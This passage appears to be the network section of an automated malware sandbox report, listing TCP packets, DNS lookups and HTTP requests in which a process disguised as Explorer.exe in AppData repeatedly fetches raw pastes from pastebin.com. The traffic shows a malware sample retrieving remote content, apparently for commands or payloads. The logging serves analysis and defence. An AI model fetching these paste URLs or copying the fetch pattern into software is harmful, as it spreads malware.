                                                            Dec 9, 2024 14:14:47.670846939 CET50032443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.670893908 CET44350032172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.670963049 CET50032443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.674499989 CET50032443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.674529076 CET44350032172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.676907063 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.677330971 CET50032443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.719341040 CET44350032172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:48.518019915 CET44350031172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:48.518114090 CET50031443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:48.518145084 CET50031443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:48.892168999 CET44350032172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:48.892263889 CET50032443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:48.892263889 CET50032443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:52.834007025 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:52.835500956 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:52.953906059 CET8050030172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:52.953974962 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:52.954926014 CET8050033172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:52.954999924 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:52.955337048 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:53.074691057 CET8050033172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.061490059 CET8050033172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.065974951 CET50034443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.066028118 CET44350034172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.066283941 CET50034443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.066740990 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.186250925 CET8050033172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.387803078 CET8050033172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.389050961 CET50035443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.389092922 CET44350035172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.389211893 CET50035443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.389611006 CET50035443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.389625072 CET44350035172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.390424013 CET50035443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:54.431344986 CET44350035172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:54.442475080 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:55.624484062 CET44350035172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:55.624548912 CET50035443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:55.624574900 CET50035443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:59.474152088 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:59.475049019 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:59.594223022 CET8050033172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:59.594307899 CET5003380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:59.594396114 CET8050036172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:59.594465017 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:59.594583988 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:59.713989019 CET8050036172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:00.693474054 CET8050036172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:00.697628021 CET50037443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:00.697628021 CET50037443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:00.697676897 CET44350037172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:00.697691917 CET44350037104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:00.697758913 CET50037443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:00.697758913 CET50037443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:00.697773933 CET44350037104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:00.699105024 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:00.818495035 CET8050036172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:01.053045988 CET8050036172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:01.060477972 CET50038443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:01.060523987 CET44350038172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:01.060591936 CET50038443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:01.061055899 CET50038443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:01.061073065 CET44350038172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:01.061933041 CET50038443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:01.107331038 CET44350038172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:01.185178041 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:01.731333971 CET44350037104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:01.731440067 CET50037443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:02.313846111 CET44350038172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:02.313956976 CET50038443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:02.313956976 CET50038443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:06.099178076 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:06.102808952 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:06.218957901 CET8050036172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:06.219043016 CET5003680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:06.222331047 CET8050039172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:06.222465038 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:06.222625017 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:06.342083931 CET8050039172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:07.324852943 CET8050039172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:07.325525999 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:07.445029020 CET8050039172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:07.647357941 CET8050039172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:07.648689985 CET50040443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:07.648736954 CET44350040172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:07.648792028 CET50040443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:07.864248037 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:12.661524057 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:12.662770033 CET5004180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:12.781359911 CET8050039172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:12.782063007 CET8050041172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:12.782191992 CET5004180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:12.782198906 CET5003980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:12.782363892 CET5004180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:12.901693106 CET8050041172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:13.880243063 CET8050041172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:13.881779909 CET50042443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:13.881849051 CET44350042172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:13.881908894 CET50042443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:13.882369995 CET5004180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:13.883327007 CET5004380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:14.002425909 CET8050041172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:14.002614975 CET8050043172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:14.002726078 CET5004180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:14.002782106 CET5004380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:14.006746054 CET5004380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:14.125967026 CET8050043172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:15.101675034 CET8050043172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:15.108261108 CET50044443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:15.108311892 CET44350044172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:15.108380079 CET50044443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:15.108460903 CET50044443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:15.145395041 CET5004380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:20.114696980 CET5004380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:20.118694067 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:20.235224962 CET8050043172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:20.235332012 CET5004380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:20.238102913 CET8050045172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:20.238183022 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:20.238331079 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:20.357688904 CET8050045172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.386061907 CET8050045172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.387552023 CET50046443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.387594938 CET44350046172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.387650013 CET50046443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.388247967 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.389034033 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.509097099 CET8050045172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.509164095 CET5004580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.509226084 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:21.509293079 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.509484053 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:21.630194902 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.617626905 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.618943930 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:22.618947983 CET50048443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:22.618993998 CET44350048172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.619354963 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:22.619381905 CET44350048104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:22.619429111 CET50048443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:22.619524002 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:22.738657951 CET8050047172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:22.738778114 CET5004780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:23.629765987 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:23.629848957 CET44350048104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:15:23.629957914 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:23.630141973 CET50048443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:15:28.646928072 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:28.766474962 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:28.766709089 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:28.766935110 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:28.886292934 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.864563942 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.865833044 CET50050443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.865869045 CET44350050172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.865921974 CET50050443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.866322041 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.866986036 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.986020088 CET8050049172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.986088991 CET5004980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.986196041 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:29.986253023 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:29.986428022 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:30.105758905 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:31.081731081 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:31.083360910 CET50052443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:31.083404064 CET44350052172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:31.083465099 CET50052443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:31.211859941 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.405633926 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.408586979 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.525526047 CET8050051172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:36.525649071 CET5005180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.528170109 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:36.528470039 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.528752089 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:36.647977114 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:37.636913061 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:37.637427092 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:37.756849051 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:38.119513035 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:38.178560972 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.140171051 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.141222954 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.260829926 CET8050053172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:43.260901928 CET5005380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.261383057 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:43.261450052 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.261617899 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:43.380855083 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.360963106 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.362515926 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:44.481884956 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.684132099 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.685547113 CET50055443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:44.685605049 CET44350055172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:44.685791969 CET50055443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:44.785852909 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.692507982 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.693284988 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.812294960 CET8050054172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:49.812390089 CET5005480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.812571049 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:49.812642097 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.812793016 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:49.932132959 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:50.940239906 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:50.940969944 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:51.060214996 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:51.260962009 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:51.334402084 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.271415949 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.271424055 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.390942097 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:56.391160965 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.391242981 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.391253948 CET8050056172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:56.392513037 CET5005680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:56.512054920 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.489962101 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.491194963 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.491241932 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.491302967 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.491842031 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.491851091 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.492746115 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.495171070 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.535336018 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.614613056 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.819231987 CET8050057172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.820337057 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.820377111 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.820437908 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.820727110 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.820741892 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.821271896 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:57.863338947 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:57.863773108 CET5005780192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:58.716339111 CET44350058172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:58.716445923 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:58.716445923 CET50058443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:59.035445929 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:59.035567999 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:59.035567999 CET50059443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:15:59.035573006 CET44350059172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:15:59.035733938 CET50059443192.168.2.5172.67.19.24

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 9, 2024 14:12:09.096935987 CET5903353192.168.2.51.1.1.1
                                                            Dec 9, 2024 14:12:09.235047102 CET53590331.1.1.1192.168.2.5
                                                            Dec 9, 2024 14:14:32.851089954 CET5316553192.168.2.51.1.1.1
                                                            Dec 9, 2024 14:14:32.990483046 CET53531651.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 9, 2024 14:12:09.096935987 CET192.168.2.51.1.1.10xe431Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            Dec 9, 2024 14:14:32.851089954 CET192.168.2.51.1.1.10xc5aStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 9, 2024 14:12:09.235047102 CET1.1.1.1192.168.2.50xe431No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Dec 9, 2024 14:12:09.235047102 CET1.1.1.1192.168.2.50xe431No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Dec 9, 2024 14:12:09.235047102 CET1.1.1.1192.168.2.50xe431No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Dec 9, 2024 14:14:32.990483046 CET1.1.1.1192.168.2.50xc5aNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Dec 9, 2024 14:14:32.990483046 CET1.1.1.1192.168.2.50xc5aNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Dec 9, 2024 14:14:32.990483046 CET1.1.1.1192.168.2.50xc5aNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • pastebin.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549704172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:09.370579958 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:12:10.460917950 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:10 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:10 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53ec85f2d7c8d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549760172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:39.626308918 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:12:40.733129025 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:40 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53f857a254325-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549765172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:40.860016108 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:12:41.956856966 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:41 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53f8d2b974325-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549787172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:48.940943956 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:12:50.116533995 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:49 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53fbfea18433e-EWR
